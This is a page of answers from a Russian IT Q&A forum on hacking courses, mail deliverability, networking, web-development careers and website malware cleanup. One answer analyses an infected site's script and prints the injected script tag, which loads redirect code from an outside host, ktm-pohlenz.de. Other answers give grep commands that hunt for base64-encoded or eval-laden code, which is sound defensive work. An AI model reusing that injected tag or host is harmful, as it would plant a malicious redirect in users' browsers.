Задать вопрос
  • Есть ли актуальные курсы по хакингу для новичков?

    sergey-gornostaev
    @sergey-gornostaev
    Седой и строгий
    Курсы. По хакингу. Для новичков.

    5e7591afbfd94542739129.jpeg
    Это абсолютно несовместимое сочетание слов!

    Почитайте этот ответ и комментарии к нему. И этот ещё полезно будет.
    Ответ написан
    Комментировать
  • Есть ли актуальные курсы по хакингу для новичков?

    DevMan
    @DevMan
    на курсах далеко не уедешь: они рассказывают основы и давно прикрытые дыры.
    для хакинга нужны не курсы, а
    1 мозг (это самое ценное)
    2. знание сетевых протоколов
    3. знание целевой системы

    остальное: совершенствование своих навыков в выше перечисленном и постоянное чтение cve и их анализ.
    Ответ написан
    Комментировать
  • Почему не доходят письма по SMTP?

    mindtester
    @mindtester
    http://iczin.su/hexagram_48
    Ответ написан
    Комментировать
  • Почему не доходят письма по SMTP?

    akelsey
    @akelsey
    А по существу:
    PTR - отвратительный ip-176-192-239-59.bb.netbynet.ru
    SPF - отсутствует: *** No text (TXT) records available for trainzcity.myftp.org
    Ну т.е. домен абсолютно не подготовлен быть сервером отправки сообщений.
    Ответ написан
    Комментировать
  • Актуальные книги по wordpress?

    нет таких книг, есть wordpress codex
    Ответ написан
    Комментировать
  • Можно ли восстановить почту через Outlook.pst?

    Zoominger
    @Zoominger
    System Integrator
    Обычно да. Просто переносите и импортируете.
    Ответ написан
    Комментировать
  • Можно ли пойти сисадмину на инженера программиста?

    sergey-gornostaev
    @sergey-gornostaev
    Седой и строгий
    На инженера-программиста может пойти и обладатель кулинарного средне-специального образования. Или человек вообще без средне-специального образования.
    Ответ написан
    Комментировать
  • Что будет, если подключить свитч вместо роутера?

    Zoominger
    @Zoominger Куратор тега Компьютерные сети
    System Integrator
    Могу предположить, что IP получит только одно устройство, остальные пролетят.
    Ответ написан
    2 комментария
  • CTF. Что почитать?

    @dmshar
    Начните с университетского курса по ИБ. Реверсинжиниринг, анализ трафика, навыки программирования, аудит инфобезопасности и анализ защищенности, системное администрирование, криптоанализ, безопасность мобильных приложений.... Вот это и есть "основа основ". Разумеется, для того, что-бы участвовать в соревнованиях к этим основам надо существенно "добавить" всякого, чего можно поверх теории освоить исключительно из практики.
    Ответ написан
    Комментировать
  • Крик души. Что можно замутить на 1500$?

    @DDwrt100
    Ну конечно не циско , но какинибудь Dlink свичи можно вполне приобрести. Или еще что подешевле.
    Непонятно , что сейчас есть вообще из инфраструктуры.
    По почтовику , купить десктоп , развернуть Ubuntu , и какой нибудь Postfix. Работать будет, как то.
    Ответ написан
    1 комментарий
  • Как найти неисправность кабеля Ethernet (разрыв, плохой контакт ИТП)?

    CityCat4
    @CityCat4 Куратор тега Сетевое оборудование
    //COPY01 EXEC PGM=IEBGENER
    Прошу не советовать сразу лан-тестер.

    Эт почему?

    Попробуй вот завязать глаза и на ощупь найти в незнакомой квартире дверь в туалет :) C какой-то по счету попытки наверное получится. Так и здесь - без тестера - как без глаз. Причем тестер должен быть не самый дишман, а такой, чтобы звонил каждый пин - потому что если обжимать скажем многожилку - недожать запросто. У меня был случай - прокладывал провод из комнаты в комнату. Прокладка сложная, по стенам, по потолку, через перегородку. Нет гигабита - и хоть ты тресни! Даже вопрос тут задавал, переобжимал несколько раз, провод похоже был некачественный. Вот именно тогда я понял, что лучше жабу удавить и купить-таки более менее приличный тестер.
    Ей-Богу, время сэкономит просто кучу. И еще большую кучу нервов.
    Ответ написан
    2 комментария
  • Что я должен сделать? Как решить проблему?

    CityCat4
    @CityCat4
    //COPY01 EXEC PGM=IEBGENER
    Как правило, к провайдеру. Ну или если провайдер жиденький, к тому, кто админит обратную зону IP-адреса. Ошибка состоит в том, что записи PTR (которая определяет обратное преобразование имени в адрес) не существует (хотя обычно провайдеры генерят ничего не значащие бла-бла-бла записи).
    Ответ написан
    Комментировать
  • Что делает этот вирус?

    27cm
    @27cm
    TODO: Написать статус
    1. Функция checkOne() достаёт ключевые слова из тега <meta name="keywords" content="..." />
    2. Если ключевые слова не найдены, то скрипт берёт ключевые фразы из utm_term.
    3. Если ключевые фразы из utm_term не найдены, то используется title страницы.

    Найденные ключевые слова кодируются и отправляются в ktm-pohlenz.de/js/jquery.min.php. В результате вставляется JavaScript, который редиректит пользователя на URL адрес, максимально соответствующий найденным ключевым словам и HTTP referer страницы. Пример для этой страницы:
    <script type="text/javascript" src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm=http%3A%2F%2Fktm…IT%26se_referrer%3Dhttps%253A%252F%252Ftoster.ru%252F%26source%3Dtoster.ru"></script>


    P.S.: Редирект возвращается не всегда. Возможно на стороне ktm-pohlenz.de есть какая-то фильтрация по IP, UA, параметру c_utt и т. д.
    Ответ написан
    6 комментариев
  • Вирус или функция - uniplacer.php как убрать?

    @Amorchica Автор вопроса
    Сам отвечаю - перестало появляется
    Поискал все файлы на слово base64 заметил что в трех картинках есть это слово - удалил, перестало появлятся

    слово base64 само по себе не зло, в обычном php часто встречается, но в картинках его быть не должно

    теперь периодически ищю скриптом
    #!/bin/bash
    find . -iname '*.gif' -type f -print| xargs grep "base64" > result.txt
    find . -iname '*.jpeg' -type f -print| xargs grep "base64" >> result.txt
    find . -iname '*.jpg' -type f -print| xargs grep "base64" >> result.txt
    find . -iname '*.htm' -type f -print| xargs grep "base64" >> result.txt
    find . -iname '*.html' -type f -print| xargs grep "base64" >> result.txt
    find . -type f -print| xargs grep -i "uniplacer" >> result.txt
    Ответ написан
    Комментировать
  • Вирус постоянно меняет права к файлам сайта на Wordpress?

    irtek
    @irtek
    Wordpress-addicted
    У вас где-то залит shell-скрипт. В идеале нужно все переустановить.
    Wordpress в обязательном порядке, тему и все плагины. Если на сервере под одним пользователем несколько сайтов, то такой враг может быть в любом из них.

    Если у вас есть доступ к серверу по SSH, то выполните команду

    find . -type f -name '*.php' | xargs grep -l "x63" --color


    или

    find . -type f -name '*.php' | xargs grep -l "x47" --color


    "точка" после find обозначает искать в папке, в которой находитесь, замените ее на путь к папке, где лежат ваш сайт или сайты или вообще заменить на слеш / тогда искать будет по всему серверу.

    Команда ищет файлы в содержании, которых есть текст "x63" или "x47". В 99% случаях из таких кодов состоит шифровка вражеских вирусов. Обратите внимание на файлы, которые найдет команда. Откройте их и посмотрите содержание. Код вируса вы сразу увидите, он весь шифрованный base64 и присутствуют команды eval. Чистите или восстановите данные файлы на чистые.
    Ответ написан
    Комментировать
  • Zyxel USG40, иногда нагрузка ЦП доходит до 98%, в чем проблема?

    hint000
    @hint000
    у админа три руки
    Зря тут пишут, что телепаты в отпуске. :)
    Гляжу в хрустальный шар, и вижу у вас там VPN на ZyXEL'е, правильно?
    А потом гляжу сюда: https://habr.com/ru/company/zyxel/blog/428477/
    и вижу в комментариях:
    Традиционная тема — в даташитах указана одна производительность VPN, а в реальных условиях имеем в почти в 3 раза меньше. Иллюзион, практически. И замеры для даташита делаются для UDP (который, IMHO, для VPN-соединения только от житейской скуки использовать можно), и при определенной длине пакета. Предложения технической поддержки заставляют задуматься, не в параллельном ли мире живет она.
    P.S. Да-да, про USG60/USG310 речь.

    А потом еще смотрю в спецификации https://www.zyxel.com/ru/ru/products_services/Unif...
    и вижу, что USG40 почти в 2 раза слабее, чем USG60. А там в комментариях ругаются на низкую производительность USG60. Так что не удивляйтесь, так и должно быть.
    Ответ написан
    Комментировать
  • Как узнать количество свободного места на сервере через ssh и отправить в php?

    FanatPHP
    @FanatPHP
    Чебуратор тега РНР
    Самый простой способ - завести SSH ключ чтобы логиниться без пароля, и в пхп написать
    $out = shell_exec("ssh user@host 'df -BM'");
    ну и распарсить потом $out;
    Ответ написан
    2 комментария
  • Насколько MS-стек секьюрный?

    DevMan
    @DevMan
    в пользовательском коде будет гораздо больше дыр, чем в стэке.
    Ответ написан
    2 комментария
  • Хочу заниматься веб-разработкой, с чего начать?

    Kozack
    @Kozack
    Thinking about a11y
    Что для этого нужно диктуют работодатели. Определите примерную ЗП которую хотите. Посмотрите список вакансий предлагающую её. Просмотрите их требования.

    У всех работодателей разная специфика. Кто-то штампует лендинги. Тут важным критерием будет насколько быстро вы можете сверстать такой, и не очень важно какие технологии вы используете.

    Кто-то выполняет разработку сайтов под ключ на WordPress. Тут вам нужно помимо помимо знаний html, css понимать как работает ВП: Какой html он генерирует при выводе меню, в каком виде он создаёт виджеты, какие теги он генерирует сам, а какие должны прописать вы. И т. д.

    У кого-то может быть один крупный корпоративный сайт. Тут вам пригодятся другие навыки.

    для этой сферы необходимо: html, css, botstrap. flexbox, grid, sass,javascript, jQuery, ES6, React.js, git

    Еееее ... нет.
    • html, css — Основные технологии для верстки.
    • flexbox, grid — отдельные свойства стилей. Должны изучаться вместе со всем остальным css.
    • javascript — Будет большим плюсом для верстки.
    • ES6 — Спецификация javascript. Должна изучаться вместе со всем остальным javascript. Это если вы хотите более серьёзно расти в этом направлении.
    • git — Будет полезен лично вам и не плохим плюсом в резюме при работе над большими проектами. При конвеерной верстке лендингов этого от вас навряд кто-то будет требовать.
    • botstrap — Набор готовых стилей. Требуется не всегда и не везде.
    • jQuery — Абстракция над скриптами. Требуется не всегда и не везде.
    • sass — Препроцессор. Альтернатива css. Требуется не всегда и не везде.
    • React.js — javascript Фреймворк. Требуется не всегда и не везде.


    Стоит ли задумываться о платных курсах

    Если видите, что того что есть в интернете вам не хватает — да. Если понимаете что без наставника у которого можна переспросить или попросить объяснить какой-то момент вы не справляетесь — да.

    За сколько я могу освоить эту отрасль для того, чтобы найти работу и развиваться дальше?

    Вы хоть уже можете начать поиски работы. Есть работодатели готовые нанимать новичков, за дешево и давать им базовые знания. И ставить на простые задачи.

    задумалась о фрилансе

    На ваше усмотрение. Но будьте готовы к большой конкуренции. С фрилансом такое дело, что вы и разработчик и менеджер по работе с клиентом. В то время как в нормальных организациях, обязанности по работе с клиентом ложатся на другого человека.

    или дистанционной работе, это реально, или лучше сперва работать на компанию

    Всё зависит от специфики компании. Как вам будет удобнее. Но если хотите развивать навыки коммуникации я бы не брал удалёнку.

    UPD.
    По личному опыту добавлю, что обучение само по себе это хорошо. Но не очень полезно. Но вот обучение в рамках решения каких-то задач — куда лучше.
    Это как с советами — он должен быть к месту. Если я просто расскажу вам что есть метод Element.scrollIntoViewIfNeeded() то скорее всего вы забудете о нем через пару дней. Но вот изучив его пытаясь найти решение какой-то проблемы — запомните о нем надолго.

    Так, что лучше всего найти какую-то работу и развиваться в рамках поставленных задач. Когда поймёте, что перестали расти — меняйте работу. У вас уже будет какой-то опыт и портфолио.

    Так же хобби проекты — как для меня, отличный способ "прокачки". Но это только в том случае если у вас есть страсть и желание искать новые способы, технологии для развития и улучшения своего детища.
    Ответ написан
    Комментировать